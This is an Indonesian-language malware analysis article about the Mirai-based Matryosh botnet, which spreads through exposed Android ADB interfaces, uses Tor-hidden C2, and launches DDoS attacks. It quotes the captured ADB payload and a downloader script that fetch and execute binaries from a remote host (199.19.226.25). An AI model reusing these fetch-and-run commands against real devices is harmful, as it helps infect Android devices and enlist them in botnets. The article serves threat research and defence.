Pada tanggal 25 Januari 2021, Sistem BotMon di 360 Cybersecurity Research Institute menemukan jenis botnet baru yang menggunakan kerangka kerja Mirai, perambatan melalui antarmuka ADB, untuk perangkat Android, terutama untuk serangan DDoS. Algoritma enkripsi didesain ulang untuk mendapatkan TOR C2 dari host jarak jauh melalui DNS TXT dan agen TOR yang diperlukan untuk berkomunikasi dengan C2.
Penyebaran Matryosh
Botnet diberi nama Matryosh berdasarkan algoritma enkripsi yang diimplementasikan oleh botnet ini dan proses mendapatkan C2 berlapis dan bersarang. Nama yang terinspirasi dari boneka Matryoshka Rusia klasik. Botnet menyerang perangkat yang Android Debug Bridge aktif dan terhubung internet. Aktif di port 5555, menangkap muatan seperti yang ditunjukkan di bawah ini, dengan fungsi utama adalah mengunduh dan mengeksekusi skrip dari host jarak jauh 199.19.226.25.
CNXN............M
..¼±§±host::features=cmd,shell_v2OPENX...........iQ..°¯º±shell:cd /data/local/tmp/; rm -rf wget bwget curl bcurl; wget http://199.19.226.25/wget; sh wget; busybox wget http://199.19.226.25/bwget; sh bwget; curl http://199.19.226.25/curl > curl; sh curl; busybox curl http://199.19.226.25/bcurl > bcurl; sh bcurl.sh.
Skrip yang dihasilkan ditunjukkan di bawah ini, dengan fungsi utama mengunduh sampel Matryosh dari host jarak jauh yang melakukan beberapa arsitektur CPU.
#!/bin/sh
n="i586 mips mipsel armv5l armv7l"
http_server="199.19.226.25"
for a in $n
do
curl http://$http_server/nXejnFjen/$a > asFxgte
chmod 777 asFxgte
./asFxgte android
done
for a in $n
do
rm $a
done
Antarmuka ADB telah menjadi sumber masalah yang diketahui untuk perangkat Android selama bertahun-tahun, dan tidak hanya untuk ponsel cerdas tetapi juga Smart TV dan perangkat pintar lainnya yang menjalankan OS Android. Selama beberapa tahun terakhir, keluarga malware seperti ADB.Miner, Ares, IPStorm, Fbot, dan Trinity, telah memindai internet untuk perangkat Android di mana antarmuka ADB telah dibiarkan aktif, terhubung ke sistem yang rentan, dan mengunduh dan menginstal muatan berbahaya. Matryosh saat ini menyebar melalui adb
Analisis Sampel
Matryosh mendukung arsitektur CPU seperti x86, ARM, mips, dll., dan memilih sampel x86 untuk analisis, dengan informasi sampel berikut:
MD5:c96e333af964649bbc0060f436c64758
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Lib:uclibc
Packer:None
Keunikan Matryosh berasal dari menggunakan jaringan Tor untuk menyembunyikan perintah dan server kontrolnya dan penggunaan proses berlapis-lapis untuk mendapatkan alamat server. Peneliti Netlab, yang biasanya termasuk yang pertama menemukan botnet yang muncul, mengatakan botnet berisi beberapa petunjuk untuk menunjukkan ini adalah karya kelompok yang sama yang mengembangkan botnet Moobot pada 2019 dan botnet LeetHozer pada 2020. Kedua botnet pada dasarnya dibangun dan digunakan untuk meluncurkan serangan DDoS, yang juga tampaknya merupakan fungsi utama Matryosh, juga. Tim Netlab mengatakan mereka menemukan fungsi dalam kode khusus untuk fitur yang akan menggunakan perangkat yang terinfeksi untuk meluncurkan serangan DDoS melalui protokol seperti TCP, UDP, dan ICMP.
Tidak Semua Perangkat Bisa Menonaktifkan ADB
ADB bisa bermanfaat dan bisa juga menjadi masalah. Meskipun pemilik smartphone dapat dengan mudah mematikan fitur ADB melalui pengaturan di opsi OS, untuk jenis perangkat berbasis Android lainnya, opsi seperti itu tidak tersedia di sebagian besar perangkat. Oleh karena itu, sebagai hasilnya, banyak sistem akan tetap rentan dan terkena serangan program jahat sseperti Matryosh dan lainnya dengan massa perangkat untuk penambangan kripto, pembajakan DNS, pencurian identitas, atau serangan DDoS.